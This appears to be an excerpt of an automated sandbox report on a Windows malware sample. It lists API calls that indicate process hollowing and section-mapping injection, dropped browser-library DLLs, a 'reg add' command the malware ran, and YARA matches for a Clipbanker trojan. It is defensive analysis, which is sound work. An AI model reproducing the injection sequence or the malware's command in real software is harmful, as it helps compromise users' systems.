            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015F8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation,0_2_00402188
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004027A0 NtClose,0_2_004027A0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation,0_2_004021A1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation,0_2_004021BB
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004015D5
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401603
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_0040161A
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004026D2 NtOpenKey,4_2_004026D2
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_00402745 NtEnumerateKey,4_2_00402745
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation,4_2_00402348
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_0040156B
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_00402770 NtEnumerateKey,4_2_00402770
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation,4_2_0040217B
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation,4_2_0040217D
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation,4_2_004021CB
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004017DF NtMapViewOfSection,NtMapViewOfSection,4_2_004017DF
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004015E0
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004015F1
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004015F5
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004015F8
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation,4_2_00402188
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004027A0 NtClose,4_2_004027A0
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation,4_2_004021A1
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation,4_2_004021BB
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A10110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,9_2_04A10110
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A70110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,14_2_04A70110
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A135209_2_04A13520
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A175209_2_04A17520
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A1A6999_2_04A1A699
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A5B69F9_2_04A5B69F
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A1E6E09_2_04A1E6E0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A1A79A9_2_04A1A79A
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A3D7F19_2_04A3D7F1
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A1C7609_2_04A1C760
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A1B0B09_2_04A1B0B0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A170E09_2_04A170E0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A130F09_2_04A130F0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A200D09_2_04A200D0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A1A0269_2_04A1A026
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A2F0309_2_04A2F030
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A1B0009_2_04A1B000
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A3D1A49_2_04A3D1A4
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A191209_2_04A19120
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A5E1419_2_04A5E141
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A922C09_2_04A922C0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A172209_2_04A17220
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A173939_2_04A17393
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A5E37C9_2_04A5E37C
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A15DE79_2_04A15DE7
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A15DF79_2_04A15DF7
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A52D1E9_2_04A52D1E
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A44E9F9_2_04A44E9F
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A18E609_2_04A18E60
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A178809_2_04A17880
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A318D09_2_04A318D0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A3E9A39_2_04A3E9A3
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A3F9B09_2_04A3F9B0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A159F79_2_04A159F7
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A189D09_2_04A189D0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A1A9169_2_04A1A916
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A17A809_2_04A17A80
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A1CA109_2_04A1CA10
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A1DBE09_2_04A1DBE0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A20B009_2_04A20B00
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A12B609_2_04A12B60
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040D24010_2_0040D240
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00419F9010_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040505710_2_00405057
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040C07010_2_0040C070
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0042E00310_2_0042E003
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0042F01010_2_0042F010
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040803010_2_00408030
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_004070E010_2_004070E0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0041016010_2_00410160
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_004C811310_2_004C8113
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_004021C010_2_004021C0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_004C934310_2_004C9343
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0044237E10_2_0044237E
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040544710_2_00405447
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040545710_2_00405457
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_004084C010_2_004084C0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_004344FF10_2_004344FF
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0044950610_2_00449506
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0043E5A310_2_0043E5A3
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0044B5B110_2_0044B5B1
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040A66010_2_0040A660
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040968610_2_00409686
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0041E69010_2_0041E690
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040674010_2_00406740
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040275010_2_00402750
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040A71010_2_0040A710
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040F73010_2_0040F730
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040878010_2_00408780
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0044D7A110_2_0044D7A1
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0042C80410_2_0042C804
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040688010_2_00406880
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0048192010_2_00481920
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0044D9DC10_2_0044D9DC
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_004069F310_2_004069F3
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00449A7110_2_00449A71
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00443B4010_2_00443B40
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00402B8010_2_00402B80
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00406B8010_2_00406B80
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00409CF910_2_00409CF9
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0044ACFF10_2_0044ACFF
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040DD4010_2_0040DD40
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00427D6C10_2_00427D6C
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040BDC010_2_0040BDC0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00409DFA10_2_00409DFA
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0042CE5110_2_0042CE51
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00406EE010_2_00406EE0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00409F7610_2_00409F76
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00420F3010_2_00420F30
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00449FE310_2_00449FE3
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7352014_2_04A73520
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7752014_2_04A77520
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04ABB69F14_2_04ABB69F
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7A69914_2_04A7A699
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7E6E014_2_04A7E6E0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7A79A14_2_04A7A79A
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A9D7F114_2_04A9D7F1
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7C76014_2_04A7C760
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7B0B014_2_04A7B0B0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A770E014_2_04A770E0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A730F014_2_04A730F0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A800D014_2_04A800D0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7A02614_2_04A7A026
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A8F03014_2_04A8F030
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7B00014_2_04A7B000
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A9D1A414_2_04A9D1A4
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7912014_2_04A79120
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04ABE14114_2_04ABE141
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04AF22C014_2_04AF22C0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7722014_2_04A77220
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7739314_2_04A77393
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04ABE37C14_2_04ABE37C
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A75DE714_2_04A75DE7
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A75DF714_2_04A75DF7
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04AB2D1E14_2_04AB2D1E
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04AA4E9F14_2_04AA4E9F
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A78E6014_2_04A78E60
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7788014_2_04A77880
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A918D014_2_04A918D0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A9E9A314_2_04A9E9A3
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A9F9B014_2_04A9F9B0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A759F714_2_04A759F7
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A789D014_2_04A789D0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7A91614_2_04A7A916
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A77A8014_2_04A77A80
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7CA1014_2_04A7CA10
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A7DBE014_2_04A7DBE0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A80B0014_2_04A80B00
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A72B6014_2_04A72B60
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0042E00315_2_0042E003
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040D24015_2_0040D240
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0041E69015_2_0041E690
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040F73015_2_0040F730
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0048192015_2_00481920
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00419F9015_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050D05015_2_0050D050
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040505715_2_00405057
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040C07015_2_0040C070
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0042F01015_2_0042F010
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050D00815_2_0050D008
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040803015_2_00408030
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050D02815_2_0050D028
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_004070E015_2_004070E0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050D09015_2_0050D090
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050D0A815_2_0050D0A8
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0041016015_2_00410160
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_004C811315_2_004C8113
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_004021C015_2_004021C0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_004C934315_2_004C9343
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0044237E15_2_0044237E
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040544715_2_00405447
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040545715_2_00405457
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_004084C015_2_004084C0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050C4E015_2_0050C4E0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_004344FF15_2_004344FF
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0044950615_2_00449506
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0043E5A315_2_0043E5A3
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0044B5B115_2_0044B5B1
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040A66015_2_0040A660
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040968615_2_00409686
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040674015_2_00406740
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040275015_2_00402750
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040A71015_2_0040A710
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040878015_2_00408780
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0044D7A115_2_0044D7A1
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0042C80415_2_0042C804
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040688015_2_00406880
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050C96015_2_0050C960
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050C92815_2_0050C928
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0044D9DC15_2_0044D9DC
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_004069F315_2_004069F3
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050C98815_2_0050C988
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050C9A815_2_0050C9A8
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00449A7115_2_00449A71
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_004E1AB015_2_004E1AB0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00443B4015_2_00443B40
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050CB7815_2_0050CB78
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00402B8015_2_00402B80
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00406B8015_2_00406B80
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00409CF915_2_00409CF9
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0044ACFF15_2_0044ACFF
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040DD4015_2_0040DD40
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050CD6015_2_0050CD60
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040BDC015_2_0040BDC0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050CDF015_2_0050CDF0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00409DFA15_2_00409DFA
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050CE5815_2_0050CE58
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0042CE5115_2_0042CE51
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00406EE015_2_00406EE0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00409F7615_2_00409F76
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00420F3015_2_00420F30
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050CF2815_2_0050CF28
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050CFC015_2_0050CFC0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00449FE315_2_00449FE3
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0050CF9015_2_0050CF90
            Source: Joe Sandbox ViewDropped File: C:\ProgramData\EGIJEBGDAFHI\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
            Source: Joe Sandbox ViewDropped File: C:\ProgramData\EGIJEBGDAFHI\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 04AA0160 appears 49 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 04A98EC0 appears 57 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 00428C81 appears 66 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 00420EC2 appears 40 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 04A40160 appears 49 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 04A38EC0 appears 57 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 004547A0 appears 64 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 00422587 appears 48 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 0042F7C0 appears 129 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 0044F23E appears 108 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 00428520 appears 125 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 00450870 appears 52 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 00454E50 appears 62 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 00441A25 appears 44 times
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: String function: 0044F26C appears 41 times
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 10876
            Source: file.exe, 00000000.00000002.1709704213.0000000002C8C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesFilezera2 vs file.exe
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
            Source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 26.2.build3.exe.9715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
